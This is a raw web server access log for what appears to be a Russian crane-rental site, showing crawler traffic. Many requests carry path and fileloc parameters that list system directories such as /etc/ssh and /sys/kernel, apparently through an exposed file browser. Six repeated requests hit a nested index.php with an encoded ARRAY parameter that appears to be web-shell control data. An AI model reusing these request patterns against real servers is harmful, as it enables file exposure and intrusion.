212.16.195.25 - - [04/Nov/2025:06:13:27 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343430372p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303830372q6665666232396330656437343466313566623736613232653335353963653161222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:16:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flicenses%2Fclamav-0.103.11 HTTP/1.0" 200 14349 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:16:21 +1000] "GET /1540480?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.71 - - [04/Nov/2025:06:16:22 +1000] "GET /listing/132628128 HTTP/1.0" 200 183393 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:16:24 +1000] "GET /1347483328?path=%2F HTTP/1.0" 200 39531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:16:27 +1000] "GET /1347082560?path=%2F HTTP/1.0" 200 39531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.205.192.249 - - [04/Nov/2025:06:16:28 +1000] "GET /228203712?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes/blocks/post-comments-form/style-rtl.css&path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes/blocks/post-comments-form HTTP/1.0" 200 15012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.14 - - [04/Nov/2025:06:16:29 +1000] "GET /1138224?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:16:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flicenses%2Fsystemd-219 HTTP/1.0" 200 17366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.98.53.242 - - [04/Nov/2025:06:16:31 +1000] "GET /wp-login.php HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
114.119.156.46 - - [04/Nov/2025:06:16:33 +1000] "GET /2439312912?path=//run HTTP/1.0" 200 73709 "https://region-logist.ru/2439312912?path=/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [04/Nov/2025:06:16:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fsys%2Fkernel%2Fslab%2Fmqueue_inode_cache HTTP/1.0" 200 59898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:16:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fzoneinfo%2FGB-Eire&path=%2F%2Fusr%2Fshare%2Fzoneinfo HTTP/1.0" 200 18471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:16:36 +1000] "GET /1533520?path=//etc/ssh HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:16:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2FX11%2Flocale HTTP/1.0" 200 101356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:16:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fsys%2Fkernel%2Fslab%2Fsock_inode_cache HTTP/1.0" 200 59646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:06:13:51 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343433312p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303833312q3732353665376131346433613439613261373335666334663138646235316163222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:06:16:44 +1000] "GET /1277968?path=//var/opt HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:16:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fnew%2FLC_MESSAGES HTTP/1.0" 200 12883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:16:46 +1000] "GET /listing/11919872 HTTP/1.0" 200 181316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:16:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Ffy HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:16:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fqaa-qtz HTTP/1.0" 200 14199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:16:53 +1000] "GET /listing/111899520 HTTP/1.0" 200 186323 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.14 - - [04/Nov/2025:06:16:54 +1000] "GET /1406832?path=//opt/fphp HTTP/1.0" 200 25834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:16:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fmy HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fold%2Fcontent%2Fnews HTTP/1.0" 200 19133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [04/Nov/2025:06:17:00 +1000] "GET /listing/135884448 HTTP/1.0" 200 202672 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:17:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fmag HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:03 +1000] "GET /1025920?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:06:14:14 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343435342p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303835342q3837306339373364323237643332386334306365613533306236616131643566222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
66.249.76.163 - - [04/Nov/2025:06:17:06 +1000] "GET /catalog/is-hit/arenda-krana-manipulyatora-kmu-novus/?fileloc=//lib/firmware/sms1xxx-nova-b-dvbt-01.fw&path=//lib/firmware HTTP/1.0" 200 190120 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:06:17:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fpl HTTP/1.0" 200 15518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fcrp HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:15 +1000] "GET /1125168?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:17:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fsys%2Fkernel%2Fslab%2Fscsi_data_buffer HTTP/1.0" 200 59646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Ffj HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fhr HTTP/1.0" 200 15518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:24 +1000] "GET /1314096?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:17:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fang HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F4ae HTTP/1.0" 200 14615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [04/Nov/2025:06:17:27 +1000] "GET /listing/131490752 HTTP/1.0" 200 183926 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [04/Nov/2025:06:14:37 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343437372p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303837372q6536636234396337646434336431633534636665323431343962303661356364222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:17:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fza HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:30 +1000] "GET /1523216?path=//etc/gss HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:17:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fss HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fkut HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.16.248.61 - - [04/Nov/2025:06:17:36 +1000] "GET /228203712?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/edit-link-form.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/1.0" 200 21417 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:17:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Ftyv HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:39 +1000] "GET /1505360?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.70 - - [04/Nov/2025:06:17:39 +1000] "GET /?28704640?shopdetail=0028671639 HTTP/1.0" 200 189226 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:17:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F371 HTTP/1.0" 200 16037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:44 +1000] "GET /1563552?path=//etc/gss HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:17:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F874 HTTP/1.0" 200 16128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fpam HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:17:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2F537 HTTP/1.0" 200 14629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:17:52 +1000] "GET /1286720?path=//var/opt HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:06:15:01 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343530312p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303930312q3235663363633064643639326237626331306233663763386235613530316434222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:17:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fiu HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:17:53 +1000] "GET /?6330480?shopdetail=0006323862 HTTP/1.0" 200 188574 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.183.200 - - [04/Nov/2025:06:17:55 +1000] "GET /1497718944?path=/home/region-gk.ru/data/www/new.region-gk.ru/.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [04/Nov/2025:06:17:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fsv HTTP/1.0" 200 15518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:18:00 +1000] "GET /1020832?path=//etc/dhcp HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fur_PK HTTP/1.0" 200 14189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fzen HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:06 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fcs_CZ HTTP/1.0" 200 14189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:18:08 +1000] "GET /1290992?path=//etc/exim HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.72 - - [04/Nov/2025:06:18:07 +1000] "GET /?1451517664?shopdetail=1449806817 HTTP/1.0" 200 197349 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:18:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fkok HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2Ff60 HTTP/1.0" 200 14597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.162.62 - - [04/Nov/2025:06:18:12 +1000] "GET /uslugi?path=/home/region-gk.ru/data/www HTTP/1.0" 200 17137 "https://region-logist.ru/uslugi" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.14 - - [04/Nov/2025:06:18:14 +1000] "GET /1429184?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fsecurity%2Fima%2Fascii_runtime_measurements&path=%2F%2Fsys%2Fkernel%2Fsecurity%2Fima HTTP/1.0" 200 12449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fka HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:06:15:25 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343532352p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303932352q3965313432616165313738343135356131396266323664333734346535393036222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:18:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2Fa42 HTTP/1.0" 200 14495 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [04/Nov/2025:06:18:20 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-load.php?f/services/ HTTP/1.0" 200 200977 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.14 - - [04/Nov/2025:06:18:22 +1000] "GET /1085440?path=//etc/ssh HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fhai HTTP/1.0" 200 14179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fuk HTTP/1.0" 200 15518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:18:30 +1000] "GET /1203344?path=//etc/gss HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
